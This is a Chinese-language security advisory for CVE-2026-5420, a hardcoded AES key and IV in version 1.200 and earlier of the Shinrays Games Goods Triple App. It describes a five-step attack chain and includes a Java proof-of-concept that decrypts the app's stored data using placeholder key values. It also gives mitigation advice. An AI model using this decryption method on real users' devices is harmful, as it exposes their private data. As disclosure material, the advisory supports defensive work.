CVE-2026-5420 Shinrays Games硬编码密钥漏洞

漏洞信息

漏洞编号

CVE-2026-5420

漏洞类型

硬编码密钥

CVSS评分

2.5 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Shinrays Games Goods Triple App

漏洞概述

Shinrays Games Goods Triple App 1.200及之前版本存在安全漏洞。该漏洞位于组件cats.goods.sort.sorting.games的jRwTX.java文件中，由于使用了硬编码的加密密钥，攻击者可通过操作AES_IV和AES_PASSWORD参数利用此漏洞。虽然攻击需要本地访问权限且复杂度较高，但成功的利用可能导致敏感信息泄露。厂商目前尚未对此披露做出回应。

技术细节

该漏洞的核心问题在于应用程序中不安全的加密实现。具体位于cats.goods.sort.sorting.games组件下的jRwTX.java文件中。开发人员在对数据进行AES加密或解密处理时，未采用安全的密钥管理机制（如Android Keystore），而是将AES初始化向量（AES_IV）和加密密码（AES_PASSWORD）直接硬编码在应用程序代码或资源文件中。这种硬编码密钥的方式违背了加密安全的基本原则。由于攻击向量为本地（AV:L），攻击者需要拥有设备的低权限访问权限。尽管攻击复杂度被标记为高（AC:H），可能是因为需要反编译APK或进行内存分析来定位和提取这些密钥，但一旦密钥被提取，攻击者即可解密应用程序本地存储的敏感数据。CVSS向量显示主要影响机密性（C:L），虽然完整性和可用性未受直接影响，但数据隐私已遭到破坏。

攻击链分析

STEP 1

信息收集

确认目标设备上安装了Shinrays Games Goods Triple App 1.200或更早版本。

STEP 2

获取本地访问

攻击者获取设备的本地低权限访问（AV:L, PR:L）。

STEP 3

逆向工程

反编译应用程序APK文件，定位到cats.goods.sort.sorting.games组件下的jRwTX.java文件。

STEP 4

提取密钥

从源代码或常量池中提取硬编码的AES_IV和AES_PASSWORD值。

STEP 5

解密数据

利用提取出的密钥解密应用程序本地存储的敏感数据，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.util.Base64;

public class CVE_2026_5420_PoC {
    // Hardcoded values extracted from jRwTX.java during reverse engineering
    public static final String HARDCODED_AES_PASSWORD = "EXTRACTED_PASSWORD_FROM_CODE";
    public static final String HARDCODED_AES_IV = "EXTRACTED_IV_16_BYTE";

    public static void main(String[] args) {
        try {
            // Assume this is encrypted data found in the app's storage
            String encryptedData = "ENCRYPTED_PAYLOAD_HERE";
            System.out.println("Attempting to decrypt using hardcoded keys...");

            String decrypted = decrypt(encryptedData, HARDCODED_AES_PASSWORD, HARDCODED_AES_IV);
            System.out.println("Decrypted Data: " + decrypted);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Decrypts data using AES/CBC/PKCS5PADDING with hardcoded keys.
     * This simulates the vulnerable logic in jRwTX.java.
     */
    public static String decrypt(String encryptedData, String password, String iv) throws Exception {
        IvParameterSpec ivSpec = new IvParameterSpec(iv.getBytes("UTF-8"));
        SecretKeySpec keySpec = new SecretKeySpec(password.getBytes("UTF-8"), "AES");

        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
        cipher.init(Cipher.DECRYPT_MODE, keySpec, ivSpec);

        byte[] decoded = Base64.getDecoder().decode(encryptedData);
        byte[] decrypted = cipher.doFinal(decoded);

        return new String(decrypted);
    }
}

影响范围

Shinrays Games Goods Triple App <= 1.200

防御指南

临时缓解措施

建议用户立即停止使用受影响版本的应用程序，直到官方发布修复补丁。开发者应移除源代码中的硬编码密钥，改用系统级密钥库（如Android Keystore）来安全地生成和存储加密密钥。在未修复前，限制对应用数据的本地访问权限。